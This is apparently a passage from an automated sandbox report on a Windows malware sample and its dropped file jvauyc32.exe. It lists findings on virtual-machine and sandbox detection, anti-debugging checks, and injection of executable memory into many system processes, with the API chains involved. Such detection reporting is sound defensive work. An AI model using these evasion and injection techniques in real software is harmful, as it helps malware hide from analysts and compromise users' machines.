2023-10-05T09:10:28Z","vs":{"BAW10":"BFBLCLAZY","BAW11":"MSBSSVLM","BAW5":"MSBCUSTVERT","BAW7":"BFBPROWSBINITCF","BAW9":"BCETONCF","CLIENT":"WINDOWS","COLUMN":"SINGLE","FEATURE.BFBCREFINER":"1","FEATURE.BFBEDUQWQSCLKWSB":"1","FEATURE.BFBLCLAZY":"1","FEATURE.BFBMSBGHF":"1","FEATURE.BFBPROWSBINITCF":"1","FEATURE.BFBSPCUSTVERT":"1","FEATURE.BFBSSFTOOB":"1","FEATURE.BFBSSVLM":"1","FEATURE.BFBWSBGHF928T":"1","FEATURE.BFBWSBRS0830TF":"1","FEATURE.MSBCUSTVERT":"1","FEATURE.MSBSSVLM":"1","FEATURE.MSNSBT1":"1","FEATURE.WSBREF-C":"1","MKT":"EN-US","MS":"0","NEWHEADER":"1","THEME":"THBRAND","UILANG":"EN"},"dev":"DESKTOP","os":"WINDOWS","osver":"11","dc":"CoreUX-Prod-MWHE01","canvas":"","sci":true,"isMidgardEnabled":true,"isHomepage":false,"snrVersion":"2023.10.04.39971431"}); } })(BingAtWork || (BingAtWork = {}));;_w.rms.js({'A:rms:answers:BoxModel:Framework':'https:\/\/r.bing.com\/rb\/18\/jnc,nj\/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w'});;
        Source: explorer.exe, 00000017.00000000.1811548975.0000000008979000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00`
        Source: explorer.exe, 00000017.00000000.1811548975.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
        Source: jvauyc32.exe, 00000012.00000003.2450849166.0000000003418000.00000004.00001000.00020000.00000000.sdmp, jvauyc32.exe, 00000012.00000003.3635004664.0000000003178000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
        Source: svchost.exe, 00000014.00000000.1740927519.000001697A6A9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;
        Source: explorer.exe, 00000017.00000002.4022108961.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000^F1O
        Source: explorer.exe, 00000017.00000000.1811548975.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000d
        Source: jvauyc32.exe, 00000012.00000002.4048026026.00000000016A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
        Source: svchost.exe, 00000014.00000002.4039173983.000001697A665000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $@os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;
        Source: jvauyc32.exe, 0000000A.00000003.2009490304.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2460098695.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.1816216518.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2331666794.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2938885386.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2847114789.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2769552015.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2524944921.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2407819962.0000000001456000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
        Source: explorer.exe, 00000017.00000003.3085615252.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}l
        Source: explorer.exe, 00000017.00000002.4022108961.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
        Source: explorer.exe, 00000017.00000003.3085615252.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: RuntimeBroker.exe, 0000001D.00000002.4032498808.0000023D71851000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeSystem information queried: ModuleInformationJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeProcess information queried: ProcessInformationJump to behavior

        Anti Debugging

        barindex
        Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_00AB130D CheckRemoteDebuggerPresent,Sleep,EnumWindows,Sleep,1_2_00AB130D
        Hides threads from debuggers
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread information set: HideFromDebugger
        Tries to detect sandboxes and other dynamic analysis tools (window names)
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeOpen window title or class name: regmonclass
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeOpen window title or class name: procmon_window_class
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeOpen window title or class name: filemonclass
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeProcess queried: DebugObjectHandleJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess queried: DebugObjectHandleJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess queried: DebugPort
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess queried: DebugObjectHandle
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess queried: DebugPort
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_00401363 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,18_2_00401363
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_01443B60 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,lstrcpy,lstrcat,RegOpenKeyExA,GetModuleFileNameA,wsprintfA,lstrlen,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,GetWindowsDirectoryA,lstrlen,lstrcat,GetComputerNameA,lstrlen,lstrlen,lstrcpy,GetUserNameA,lstrlen,lstrcpy,lstrlen,lstrlen,GetTempPathA,lstrlen,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrlen,lstrcat,CreateFileMappingA,lstrlen,GetTickCount,wsprintfA,lstrlen,wsprintfA,lstrcat,GetSystemDirectoryA,lstrlen,lstrcat,lstrcat,lstrcat,GlobalAlloc,GlobalAlloc,1_2_01443B60
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_00AB14BA mov eax, dword ptr fs:[00000030h]1_2_00AB14BA
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 10_2_009714BA mov eax, dword ptr fs:[00000030h]10_2_009714BA
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_00403B87 mov eax, dword ptr fs:[00000030h]18_2_00403B87
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_00403BBC mov eax, dword ptr fs:[00000030h]18_2_00403BBC
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_01441EF6 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,CloseHandle,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpiA,lstrcmpiA,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,1_2_01441EF6
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess token adjusted: DebugJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Allocates memory in foreign processes
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: F10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 190000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeMemory allocated: C:\Windows\System32\dwm.exe base: 660000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: F20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 1A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Windows\System32\dwm.exe base: 670000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Windows\System32\sihost.exe base: D20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 3F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 8D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 7F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Windows\explorer.exe base: B60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: A30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 620000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 160000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 980000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 890000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: F70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: AA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 210000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Windows\System32\conhost.exe base: 90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 12B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 12C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 790000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: AD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: AE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: B90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: BA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 11D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 11E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 4E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 4F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1040000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1050000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 5D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 5E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1350000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1360000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 600000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 610000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 190000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 5A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 5B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: E00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: E10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 790000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 820000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 830000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: F40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: F50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: F00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: F50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A50000 protect: page execute and read and writeJump to behavior
